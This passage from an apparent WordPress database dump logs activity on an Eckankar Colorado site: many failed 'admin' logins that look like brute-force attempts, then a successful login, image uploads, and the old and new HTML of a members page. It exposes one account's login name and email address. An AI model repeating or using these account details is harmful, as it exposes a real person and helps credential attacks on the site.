Safari/537.36'),(231144,39117,'_message_key','user_unknown_login_failed'),(231145,39117,'_server_remote_addr','104.244.72.x'),(231146,39118,'failed_username','admin'),(231147,39118,'server_http_user_agent','Mozilla/5.0'),(231148,39118,'_message_key','user_unknown_login_failed'),(231149,39118,'_server_remote_addr','45.136.118.x'),(231150,39119,'failed_username','admin'),(231151,39119,'server_http_user_agent','Mozilla/5.0'),(231152,39119,'_message_key','user_unknown_login_failed'),(231153,39119,'_server_remote_addr','20.169.51.x'),(231154,39120,'failed_username','admin'),(231155,39120,'server_http_user_agent','Mozilla/5.0'),(231156,39120,'_message_key','user_unknown_login_failed'),(231157,39120,'_server_remote_addr','45.136.118.x'),(231158,39121,'failed_username','admin'),(231159,39121,'server_http_user_agent','Mozilla/5.0'),(231160,39121,'_message_key','user_unknown_login_failed'),(231161,39121,'_server_remote_addr','20.169.51.x'),(231162,39122,'failed_username','admin'),(231163,39122,'server_http_user_agent','Mozilla/5.0'),(231164,39122,'_message_key','user_unknown_login_failed'),(231165,39122,'_server_remote_addr','45.136.118.x'),(231166,39123,'failed_username','admin'),(231167,39123,'server_http_user_agent','Mozilla/5.0'),(231168,39123,'_message_key','user_unknown_login_failed'),(231169,39123,'_server_remote_addr','20.169.51.x'),(231170,39124,'failed_username','admin'),(231171,39124,'server_http_user_agent','Mozilla/5.0'),(231172,39124,'_message_key','user_unknown_login_failed'),(231173,39124,'_server_remote_addr','20.169.51.x'),(231174,39125,'failed_username','admin'),(231175,39125,'server_http_user_agent','Mozilla/5.0'),(231176,39125,'_message_key','user_unknown_login_failed'),(231177,39125,'_server_remote_addr','45.136.118.x'),(231178,39126,'failed_username','admin'),(231179,39126,'server_http_user_agent','Mozilla/5.0'),(231180,39126,'_message_key','user_unknown_login_failed'),(231181,39126,'_server_remote_addr','20.169.51.x'),(231182,39127,'failed_username','admin'),(231183,39127,'server_http_user_agent','Mozilla/5.0'),(231184,39127,'_message_key','user_unknown_login_failed'),(231185,39127,'_server_remote_addr','45.136.118.x'),(231186,39128,'failed_username','admin'),(231187,39128,'server_http_user_agent','Mozilla/5.0'),(231188,39128,'_message_key','user_unknown_login_failed'),(231189,39128,'_server_remote_addr','45.136.118.x'),(231190,39129,'failed_username','admin'),(231191,39129,'server_http_user_agent','Mozilla/5.0'),(231192,39129,'_message_key','user_unknown_login_failed'),(231193,39129,'_server_remote_addr','45.136.118.x'),(231194,39130,'failed_username','admin'),(231195,39130,'server_http_user_agent','Mozilla/5.0'),(231196,39130,'_message_key','user_unknown_login_failed'),(231197,39130,'_server_remote_addr','45.136.118.x'),(231198,39131,'failed_username','admin'),(231199,39131,'server_http_user_agent','Mozilla/5.0'),(231200,39131,'_message_key','user_unknown_login_failed'),(231201,39131,'_server_remote_addr','45.136.118.x'),(231202,39132,'failed_username','admin'),(231203,39132,'server_http_user_agent','Mozilla/5.0'),(231204,39132,'_message_key','user_unknown_login_failed'),(231205,39132,'_server_remote_addr','45.136.118.x'),(231206,39133,'failed_username','admin'),(231207,39133,'server_http_user_agent','Mozilla/5.0'),(231208,39133,'_message_key','user_unknown_login_failed'),(231209,39133,'_server_remote_addr','45.136.118.x'),(231210,39134,'failed_username','admin'),(231211,39134,'server_http_user_agent','Mozilla/5.0'),(231212,39134,'_message_key','user_unknown_login_failed'),(231213,39134,'_server_remote_addr','45.136.118.x'),(231214,39135,'failed_username','admin'),(231215,39135,'server_http_user_agent','Mozilla/5.0'),(231216,39135,'_message_key','user_unknown_login_failed'),(231217,39135,'_server_remote_addr','45.136.118.x'),(231218,39136,'failed_username','admin'),(231219,39136,'server_http_user_agent','Mozilla/5.0'),(231220,39136,'_message_key','user_unknown_login_failed'),(231221,39136,'_server_remote_addr','45.136.118.x'),(231222,39137,'failed_username','admin'),(231223,39137,'server_http_user_agent','Mozilla/5.0'),(231224,39137,'_message_key','user_unknown_login_failed'),(231225,39137,'_server_remote_addr','45.136.118.x'),(231226,39138,'failed_username','admin'),(231227,39138,'server_http_user_agent','Mozilla/5.0'),(231228,39138,'_message_key','user_unknown_login_failed'),(231229,39138,'_server_remote_addr','45.136.118.x'),(231230,39139,'failed_username','admin'),(231231,39139,'server_http_user_agent','Mozilla/5.0'),(231232,39139,'_message_key','user_unknown_login_failed'),(231233,39139,'_server_remote_addr','45.136.118.x'),(231234,39140,'failed_username','administrator'),(231235,39140,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(231236,39140,'_message_key','user_unknown_login_failed'),(231237,39140,'_server_remote_addr','209.141.34.x'),(231238,39141,'failed_username','admin'),(231239,39141,'server_http_user_agent','Mozilla/5.0'),(231240,39141,'_message_key','user_unknown_login_failed'),(231241,39141,'_server_remote_addr','45.136.118.x'),(231242,39142,'failed_username','admin'),(231243,39142,'server_http_user_agent','Mozilla/5.0'),(231244,39142,'_message_key','user_unknown_login_failed'),(231245,39142,'_server_remote_addr','45.136.118.x'),(231246,39143,'failed_username','admin'),(231247,39143,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(231248,39143,'_message_key','user_unknown_login_failed'),(231249,39143,'_server_remote_addr','205.185.120.x'),(231250,39144,'failed_username','admin'),(231251,39144,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(231252,39144,'_message_key','user_unknown_login_failed'),(231253,39144,'_xmlrpc_request','true'),(231254,39144,'_server_remote_addr','20.14.80.x'),(231255,39145,'failed_username','admin'),(231256,39145,'server_http_user_agent','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(231257,39145,'_message_key','user_unknown_login_failed'),(231258,39145,'_server_remote_addr','198.98.51.x'),(231259,39146,'user_id','2'),(231260,39146,'user_email','nada@zipnadanot.org'),(231261,39146,'user_login','S8zhaBda'),(231262,39146,'_user_id','2'),(231263,39146,'_user_login','S8zhaBda'),(231264,39146,'_user_email','nada@zipnadanot.org'),(231265,39146,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(231266,39146,'_message_key','user_logged_in'),(231267,39146,'_server_remote_addr','76.130.120.x'),(231268,39146,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(231269,39147,'post_type','attachment'),(231270,39147,'attachment_id','269230'),(231271,39147,'attachment_title','tree-path-5'),(231272,39147,'attachment_filename','tree-path-5.jpg'),(231273,39147,'attachment_mime','image/jpeg'),(231274,39147,'attachment_filesize','805906'),(231275,39147,'_message_key','attachment_created'),(231276,39147,'_user_id','2'),(231277,39147,'_user_login','S8zhaBda'),(231278,39147,'_user_email','nada@zipnadanot.org'),(231279,39147,'_server_remote_addr','76.130.120.x'),(231280,39147,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(231281,39148,'post_type','attachment'),(231282,39148,'attachment_id','269231'),(231283,39148,'attachment_title','sunset-gold-ocean-eagle-7'),(231284,39148,'attachment_filename','sunset-gold-ocean-eagle-7.jpg'),(231285,39148,'attachment_mime','image/jpeg'),(231286,39148,'attachment_filesize','328706'),(231287,39148,'_message_key','attachment_created'),(231288,39148,'_user_id','2'),(231289,39148,'_user_login','S8zhaBda'),(231290,39148,'_user_email','nada@zipnadanot.org'),(231291,39148,'_server_remote_addr','76.130.120.x'),(231292,39148,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(231293,39149,'post_id','68102'),(231294,39149,'post_type','page'),(231295,39149,'post_title','Initiate Page'),(231296,39149,'post_prev_post_title','Members Page'),(231297,39149,'post_new_post_title','Initiate Page'),(231298,39149,'post_prev_post_name','members-page'),(231299,39149,'post_new_post_name','initiate-page'),(231300,39149,'post_prev_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0.15)), url(\'https://eckankar-colorado.org/wp-content/uploads/2019/08/moon-river.jpg\'); background-size: cover; background-position: 50% 14%; background-color: #6d88cc;\" data-bg-overlaycolor=\"rgba(255,255,255,0.15)\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/moon-river.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 180px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12 col-lg-2\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-8\" style=\"text-align: left;\">\r\n<h1 class=\"color1-color\" style=\"text-transform: capitalize; font-size: 66px; letter-spacing: 1px; margin-top: 81px; text-align: center;\">Eckankar <strong>members area</strong></h1>\r\n<blockquote class=\"color1-border-color\" style=\"margin-left: 74px; margin-top: 52px;\">\r\n<p class=\"color1-color\" style=\"font-size: 22px; line-height: 28px;\">When you are with others, realize that they too are lights of God who are also trying to find their way home to a better, happier, more graceful life.</p>\r\n</blockquote>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-1 col-xs-12 col-lg-2\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f6f6f8;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3 color3-color\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 30px; color: #a1ccf6;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 22px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK members who choose to come&nbsp;together once or twice a month to further their spiritual understanding through study&nbsp;of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock\" style=\"background-color: #d7e2ef;\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"text-align: center; font-size: 25px; color: #1d5791; text-transform: capitalize; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">CALENDARS fOR mEMBER eVENTS</p>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-top: 2px; margin-bottom: -5px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<div class=\"bg-hr bg-hr-16\" style=\"width: 26%; color: #23507d;\"></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #d7e2ef;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase;\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase;\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase;\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase;\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock\" style=\"background-color: #ebf4ff;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; color: #1d5791; font-family: \'Raleway\'; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"bg-box-1 color1-background-color color-1-text-contrast bg-background-color bg-box\" style=\"padding: 15px 10px; border-top: 10px solid   #3D7CBB; margin-bottom: 20px;\">\r\n<p class=\"\" style=\"font-size: 16px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<strong>&nbsp;<a href=\"https://eckankar-colorado.org/resa-faq/resa-structure-org-chart-pdf/\" rel=\"noopener noreferrer\">Org Chart</a> / <a href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener noreferrer\">RESA FAQ</a></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; color: #1d5791; font-family: \'Raleway\'; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"bg-box-1 color1-background-color color-1-text-contrast bg-background-color bg-box\" style=\"padding: 15px 10px; border-top: 10px solid  #3D7CBB; margin-bottom: 20px;\">\r\n<p class=\"\" style=\"font-size: 16px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<strong>&nbsp;<a href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\"> Go Here To Get In Touch</a></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; color: #1d5791; font-family: \'Raleway\'; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"bg-box-1 color1-background-color color-1-text-contrast bg-background-color bg-box\" style=\"padding: 15px 10px; border-top: 10px solid  #3D7CBB; margin-bottom: 20px;\">\r\n<p class=\"\" style=\"font-size: 16px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\"><strong>&nbsp;Contact an ECK Leader&nbsp;</strong></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; color: #1d5791; font-family: \'Raleway\'; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"bg-box-1 color1-background-color color-1-text-contrast bg-background-color bg-box\" style=\"padding: 15px 10px; border-top: 10px solid  #3D7CBB; margin-bottom: 20px;\">\r\n<p class=\"\" style=\"font-size: 16px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<strong>&nbsp; <a class=\"\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a> </strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2020/10/welcome-ocean-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2020/10/welcome-ocean-1.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 0.9em;\">\r\n<div style=\"border: 12px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0; padding-bottom: 0;\" class=\"color1-border-color bg-box\">\r\n<div class=\"row\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -5px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center;\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 23px; text-align: center;\">ECk members</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"color1-color\" style=\"font-size: 24px; font-weight: 500; font-family: \'Raleway\';\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #d7e2ef;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #d7e2ef;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\"><i class=\"color1-color fa fa-heart\" style=\"font-size: 35px; color: #1d5791 !important;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"color1-color fa fa-newspaper-o\" style=\"font-size: 35px; color: #1d5791 !important;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Member Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\">Sign up to receive your local Members Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"color1-color fa fa-check-square-o\" style=\"font-size: 35px; color: #1d5791 !important;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\"><i class=\"color1-color fa fa-star\" style=\"font-size: 35px; color: #1d5791 !important;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 16px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231301,39149,'post_new_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.16), rgba(255, 255, 255, 0.16)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.16)\" data-bg-overlaycolor-alpha=\"0.16\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 